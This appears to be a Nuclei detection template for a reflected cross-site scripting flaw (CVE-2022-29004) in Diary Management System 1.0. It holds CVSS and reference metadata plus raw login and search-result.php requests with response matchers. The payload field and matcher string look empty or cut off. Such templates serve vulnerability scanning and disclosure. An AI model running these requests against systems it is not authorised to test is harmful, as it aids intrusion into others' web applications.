id: CVE-2022-29004 info: name: Diary Management System 1.0 - Cross-Site Scripting author: TenBird severity: medium description: | Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php. reference: - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/ - http://phpgurukul.com - https://nvd.nist.gov/vuln/detail/CVE-2022-29004 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29004 cwe-id: CWE-79 cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:*:*:*:*:*:*:*:* epss-score: 0.00103 metadata: max-request: 2 verified: "true" tags: cve,cve2022,xss,authenticated,edms http: - raw: - | POST /edms/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 logindetail={{username}}&userpassword={{password}}&login= - | POST /edms/search-result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 searchdata= cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - 'Serach Result Against "' - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/09/14